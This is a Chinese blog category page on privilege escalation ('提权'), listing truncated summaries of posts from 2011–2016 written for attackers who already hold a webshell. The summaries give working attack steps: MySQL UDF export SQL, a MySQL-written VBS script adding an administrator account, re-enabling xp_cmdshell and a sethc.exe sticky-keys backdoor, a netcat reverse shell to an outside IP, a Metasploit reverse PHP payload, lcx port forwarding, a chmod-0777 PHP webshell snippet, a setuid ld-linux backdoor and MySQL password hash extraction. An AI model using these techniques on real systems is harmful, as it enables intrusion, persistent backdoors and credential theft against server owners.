文章分类 -  提权

只有NTLM hash 情况下上传执行程序的方法
该文被密码保护。

posted @ 2016-07-20 05:01 =_=! 阅读(0) 评论(0) 推荐(0)

解决mysql提权user.MYD hash无法查看
摘要:提权时,当下载mysql的user.MYD数据库连接密码hash值无法用winhex等十六进制编辑器查看时:停止mysql服务将下载的user.MYD user.frm user.MYI替换本地文件,然后cd mysqlbinmysqld-nt –skip-grant-tables重新打开一个cmd... 阅读全文

posted @ 2015-03-09 08:53 =_=! 阅读(265) 评论(0) 推荐(0)

iis6 提权提示 Can not find wmiprvse.exe 的突破方法
摘要:方法一:在IIS环境下,如果权限做得不严格,我们在aspx大马里面是有权限直接结束wmiprvse.exe进程的。进程查看里面直接K掉在结束之后,它会再次运行,这时候的PID值的不一样的。这时候我们回来去运行exp。直接秒杀。方法二:虚拟主机,一般权限严格限制的,是没权限结束的,这时候我们可以考虑配... 阅读全文

posted @ 2014-07-22 11:43 =_=! 阅读(341) 评论(0) 推荐(0)

除了mof还有它能自动运行
摘要:论坛有个很古老的贴是通过mysql 导文件为mof自动运行达到提权的目的,但是只支持2003不支持win7以上系统。刚好又遇到一个问题,就是在管理员映射磁盘到终端的情况下,怎么能传个文件过去就自动运行立马上线的,传统的都是丢启动项,时间等得又久还可能被发现。刚好管理员机器是win7 x64位的,于是... 阅读全文

posted @ 2014-07-21 23:45 =_=! 阅读(375) 评论(0) 推荐(0)

另类的提权方法当"can't find WMI process PID."
摘要:现在提权经常会遇到这种情况比如用常见的提权杀器提权的时候会出现can’t find WMI process PID.这个时候怎么办 通常清苦下来讲这个程序是通过wmip~这个进程来实现 获取注册表并覆盖访问那么出现 fuck,can’t find WMI process PID.时我们一般来讲是重启... 阅读全文

posted @ 2014-04-13 20:52 =_=! 阅读(449) 评论(0) 推荐(0)

FileZilla Server提权实例演示
摘要:前段时间lengf牛写了篇文章关于FileZilla Server的提权测试,俺看了也觉得不错 这不今天刚好遇上一个FileZilla Server的服务器,咋试试提权。当然lengf牛的是在FileZilla Server的目录有可写权限修改配置文件的情况下。如果目录不可写是否没办法了呢,大家有没有想到G6FTP如何提权的, G6FTP是把本机管理端口转发到自己的机器然后远程连接ftp服务器的。这个是我复制回来的 服务器的管理信息下面看我今天的演示:本机执行lcx监听lcx2 -listen 51 2001Webshell下上传lcx 转发Lcx –slave 你的ip 端口 要转发的ip 阅读全文

posted @ 2014-01-05 09:51 =_=! 阅读(475) 评论(0) 推荐(0)

udf手动导出提权
摘要:当默认udf导出失败时,可以尝试用手动方法导出udf进行提权,具体方法如下:先上传udf.dll,连接到mysql,再按下面步骤执行sql语句。 createtablezz(abclongblob);//注意列类型为longblobinsertintozzvalues(load_file('c:/tmp/cmd.txt'));//上传的udf.dll路径selectabcfromzzintodumpfile'C:/ProgramFiles/MySQL/MySQLServer5.1/lib/plugin/sqlmap.log';//导入的目标地址mysql5.0以 阅读全文

posted @ 2014-01-02 23:54 =_=! 阅读(693) 评论(0) 推荐(0)

mssql提权中SA遇到的问题解决方法
摘要:SQL Server 阻止了对组件 ‘xp_cmdshell’ 的 过程’sys.xp_cmdshell’的访问,因为此组件已作为此服务器安全配置的一部分而被关闭。系统管理员可以通过使用 sp_configure 启用‘xp_cmdshell’。有关启用‘xp_cmdshell’ 的详细信息,请参阅 SQL Server 联机丛书中的“外围应用配置器”。SQL2005 在默认的设置中是删除了 XP_CMDSHELL的,因此也在注射过程中产生了点困难。后来经过查看MSSQL2005的手册才知道情况原来如此:用下面一句话就可以了解决了。 ;EXEC sp_configure ‘show advan 阅读全文

posted @ 2012-11-03 06:17 =_=! 阅读(296) 评论(0) 推荐(0)

mssql exec xp_cmdshell 调用'CreateProcess'失败解决办法
摘要:mssql 数据库注入时 exec xp_cmdshell 调用 'CreateProcess' 失败的解决办法。微软ms sql 2000/2005 注入时exec xp_cmdshell 调用 'CreateProcess' 失败,错误代码: '5',两种解决办法。原因不说了,一般都是cmd.exe被限制权限了,system用户没有权限,解决方法2种:1、替换shift文件(在开启3389情况下):下面两条语句为分别执行的。这条语句将explorer.exe复制为sethc.exedeclare @o int exec sp_oacreate 阅读全文

posted @ 2012-09-20 01:06 =_=! 阅读(1652) 评论(0) 推荐(0)

cacls.exe
摘要:xpsql.cpp: 错误 5 来自 CreateProcess(第 737 行)怎么解决、很简单的解决方法cmd 权限问题cacls.exe C:\WINdows\system32\cmd.exe /e /t /g system:FC:\Documents and Settings\Administrator>cacls.exe C:\WINdows\system32\cmd.exe /e /t /g system:F处理的文件: C:\WINdows\system32\cmd.exe处理的文件: C:\WINdows\system32\dllcache\cmd.execacls.ex 阅读全文

posted @ 2012-09-14 13:55 =_=! 阅读(442) 评论(0) 推荐(0)

不支持PHP情况下,3306端口远程连接mysql提权
摘要:思路:写入启动项目揽权有root密码了,Navicat连接上去执行sql语句createtablea(cmdtext);insertintoavalues(“setwshshell=createobject(“”wscript.shell”")”);insertintoavalues(“a=wshshell.run(“”cmd.exe/cnetuser11/add”",0)”);insertintoavalues(“b=wshshell.run(“”cmd.exe/cnetlocalgroupAdministrators1/add”",0)”);select*fr 阅读全文

posted @ 2012-09-08 05:20 =_=! 阅读(460) 评论(0) 推荐(0)

MySQL Root密码另类破解
摘要:提权时,当下载mysql的user.MYD数据库连接密码hash值无法用winhex等十六进制编辑器查看时:停止mysql服务将下载的user.MYD user.frm user.MYI替换本地文件,然后cd mysql\binmysqld-nt --skip-grant-tables重新打开一个cmdmysql -u rootselect user,password from mysql.user; 阅读全文

posted @ 2011-12-13 12:10 =_=! 阅读(255) 评论(0) 推荐(0)

不能su交互的解决方法
摘要:用nst的反弹后门连上nc后不能su交互,报错如下:standard in must be a tty解决方法:python -c ‘import pty; pty.spawn(“/bin/sh”)’得到shell就可以su进行交互了。 阅读全文

posted @ 2011-12-06 22:16 =_=! 阅读(925) 评论(0) 推荐(0)

linux下用webshell对文件权限的修改
摘要:当我们拥有了一个linux下的shell(服务器上多个网站)。 这个shell对所在站点的根目录有可写入权限,甚至能查看其他网站的目录。 那么,这样的主机设置肯定是不安全的。 有的时候,我们想对获得同服务器的其他站的权限,比如直接对其他站点的index.php进行修改,却发现没有权限。 我们可以尝试通过以下脚本来实现对其他站点的文件添加权限。 代码: <?php $path = stripslashes($_GET[&apos;path&apos;]); $ok = chmod ($path , 0777); if ($ok == true) echo " CH 阅读全文

posted @ 2011-11-04 19:39 =_=! 阅读(1250) 评论(0) 推荐(0)

linux添加root权限用户
摘要:第一步,添加普通用户创建用户、设置密码、修改用户、删除用户:useradd testuser创建用户testuserpasswd testuser给已创建的用户testuser设置密码说明:新创建的用户会在/home下创建一个用户目录testuserusermod --help修改用户这个命令的相关参数userdel testuser删除用户testuserrm -rf testuser删除用户testuser所在目录上面的几个命令只有root账号才可以使用,如果你不知道自己的系统上面的命令在什么位置可以使用如下命令查找其路径:locate useradd第二步,添加权限编辑/etc/pass 阅读全文

posted @ 2011-11-04 09:55 =_=! 阅读(522) 评论(0) 推荐(0)

不用root权限去修改不同组用户的文件
摘要:我的情况是这样的,拿到shell后,id查看权限为apache,id=48,而网站的文件权限为nobody,id=99.cat /etc/passwd按理apache权限比nobody权限高,但是实际情况就是网站文件修改不了。这个时候该怎么办呢? 上传个覆盖?不行!提权?2.6.18-194.32.1.el5 这个内核貌似不好提。想到以前的一个chown.php,试试了 哈哈,果然把该文件的nobody权限改为apache权限了。这下,我就可以修改了。嘿嘿 阅读全文

posted @ 2011-11-04 08:43 =_=! 阅读(421) 评论(0) 推荐(0)

当Linux提权不能反弹Shell时利用metasploit进行提权
摘要:当LINUX提权反弹不了时.经常遇到这种情况 请出MSF ..1 .生成WEBSHELL文件 msf > msfpayload php/reverse_php LHOST=你的IP LPORT=端口 R > dis9.php 我的BT4是在/ROOT/ 目录 然后吧dis9.php加 才能运行 把dis9.php传进你的SHELL里 例如 www.91ri.org/dis9.php2 . 然后MSF设置接口模板和参数 msf > use multi/handler //进入 multi/handler 接口 msf exploit(handler) > set PAYL 阅读全文

posted @ 2011-09-22 01:56 =_=! 阅读(1123) 评论(0) 推荐(0)

转发3389到80突破防火墙
摘要:干掉IPSEC后仍然无法连接3389,就可以用到此工具,自动停止IIS将3389转到80上工具的命令是在cmd下输入antifw -s 运行程序 停止iis将3389改为80antifw -l 关闭程序。恢复iisweb服务器肯定不限制80端口的连接,所以开了防火墙也不会限制80…所以用这个你再开防火墙也没有用。工具下载 阅读全文

posted @ 2011-06-28 13:59 =_=! 阅读(481) 评论(0) 推荐(0)

利用WebShell反弹低权限CmdShell
摘要:虽然是低权限的,能做的事和WebShell上的差不多,不过使用起来还是要方便很多。前提:1.能用WebShell运行cmd命令。方法有很多,首先是WScript.Shell,如果被改名或者被删了,就找可运行目录上传cmd.exe。2.上传nc。可以跟cmd.exe上传到同一目录。步骤:现在本地监听一个端口。nc -vv -l -p 8080最好是80或8080这样的端口,被防火墙拦截的几率小很多。我机器80被Apache占了,就用8080了。在WebShell运行下面命令连接我们监听的端口得到CmdShell:nc -vv 222.71.138.177 8080 -e C:\Documents 阅读全文

posted @ 2011-06-24 06:22 =_=! 阅读(810) 评论(0) 推荐(0)

webshell下linux提权+留后门
摘要:方法一:setuid的方法,其实8是很隐蔽。看看过程:[root@localdomain lib]# ls -l |grep ld-linuxlrwxrwxrwx 1 root root 9 2008-06-07 17:32 ld-linux.so.2 -> ld-2.7.solrwxrwxrwx 1 root root 13 2008-06-07 17:47 ld-lsb.so.3 -> ld-linux.so.2[root@localdomain lib]# chmod +s ld-linux.so.2[root@localdomain lib]# ls -l |grep ld 阅读全文

posted @ 2011-06-04 13:07 =_=! 阅读(535) 评论(0) 推荐(0)

导航